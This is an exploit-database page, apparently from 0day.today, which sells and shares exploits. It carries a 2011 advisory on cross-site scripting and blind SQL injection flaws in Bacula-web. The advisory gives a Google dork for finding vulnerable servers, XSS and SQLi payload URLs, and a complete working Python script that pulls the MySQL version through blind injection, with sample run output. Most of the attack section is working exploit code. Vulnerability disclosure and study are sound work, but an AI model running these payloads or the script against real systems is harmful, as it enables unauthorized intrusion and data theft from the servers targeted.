0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Bacula-web 1.3.x - 5.0.3 Multiple Remote Vulnerabilities
GotGeek Labs http://www.gotgeek.com.br/ Bacula-web 1.3.x - 5.0.3 Multiple Remote Vulnerabilities [+] Description Bacula-Web is a web based tool that provide you a summarized view of your bacula director. It obtain his information from your bacula catalog's database. It provide some usefull informations such as: * Last 24 hours jobs status (completed, failed, waiting, etc.) * Medias and Pool usage * Last 7 days storage usage The main advantages of this tool are * it's web based, so you can reach it simply through your preferred browser from anywhere * it's pretty easy to install (you just need a LAMP server with a valid Bacula catalog database connection) * it contain a lot of information into a single page (have a look on your last jobs for example) This is a fairly high level Bacula management tool. [+] Information Title: Bacula-web 1.3.x - 5.0.3 Multiple Remote Vulnerabilities Google Dork: intitle:bacula-web "Status" Advisory: gg-004-2011 Date: 02-22-2011 Last update: 03-04-2011 Link: http://www.gotgeek.com.br/pocs/gg-004-2011.txt Tested on: FreeBSD 7.2-RELEASE + MySQL 5.x [+] Vulnerabilities Cross-site Scripting: Bacula-web is affected by cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. XSS: http://target/bacula/report.php?default=1&server=Backup_inc<script>alert("xss")</script> Blind SQL Injection: Bacula-web is also affected by blind SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. *Blind SQLi: http://target/bacula/report.php?default=1&server=Backup_inc' and 1='2 #FALSE http://target/bacula/report.php?default=1&server=Backup_inc' and 1='1 #TRUE *Need a valid job name at server variable with some data to get false or true page. Affected Versions: (1)Bacula-web 5.0.3 (2)Bacula-web 1.38.9_1 (FreeBSD) Other versions may also be vulnerable. [+] Proof of Concept/Exploit # $ python bacula-web.py -t 10.1.1.1 -d /bacula/ -j Backup_inc -p 80 # # [*] gotgeek labs # [*] http://gotgeek.com.br # # # [*] Checking report.php... # [+] Found! # [*] Let's get MySQL version.. Wait a moment... # [+] MySQL: 5.0.84 # # [*]Done! #!/usr/bin/python # import sys import httplib, socket import urllib, re from optparse import OptionParser # You may also use "MB".. Check your target before! truestr = "GB" usage = "./%prog -t <target> -d <dir> -j <job> -p <port>\n" usage+= "Example: ./%prog -t www.example.com -d /bacula-web/ -j BackupCatalog -p 80" parser = OptionParser(usage=usage) parser.add_option("-t", action="store", dest="target", help="target server") parser.add_option("-d", action="store", dest="dir", help="path to bacula-web") parser.add_option("-j", action="store", dest="job", help="bacula job name") parser.add_option("-p", action="store", dest="port", help="server port") (options, args) = parser.parse_args() def banner(): print "\n[*] gotgeek labs" print "[*] http://gotgeek.com.br\n\n" if len(sys.argv) < 5: banner() parser.print_help() sys.exit(1) def checkurl(): try: print "[*] Checking report.php..." conn = httplib.HTTPConnection(options.target+":"+options.port) conn.request("GET", options.dir + "report.php") r1 = conn.getresponse() if r1.status == 200: print "[+] Found!" else: print "[-] NOT Found!\n\n" sys.exit(1) except socket.error, msg: print "[-] Can't connect to the target!\n\n" sys.exit(1) def geturl(sqli): try: check = urllib.urlopen("http://"+options.target+":"+options.port+options.dir+sqli).read() except: print "[-] Can't connect to the target!\n\n" sys.exit(1) return check def getmysql(gg): for i in range(43,58): request = ("report.php?default=1&server="+options.job+"'%20and%20ascii(substring(@@version,"+str(gg)+",1))='"+str(i)) result = geturl(request) if re.search(truestr,result): gg = gg+1 sys.stdout.write(chr(i)) sys.stdout.flush() getmysql(gg) break def main(): gg = 1 banner() checkurl() print "[*] Let's get MySQL version.. Wait a moment..." sys.stdout.write("[+] MySQL: ") getmysql(gg) print "\n\n[*]Done!\n\n" if __name__ == "__main__": main() [+] References (1)http://bacula-web.dflc.ch/index.php/home.html (2)http://www.freshports.org/www/bacula-web/ [+] Credits b0telh0 # 0day.today [2024-12-25] #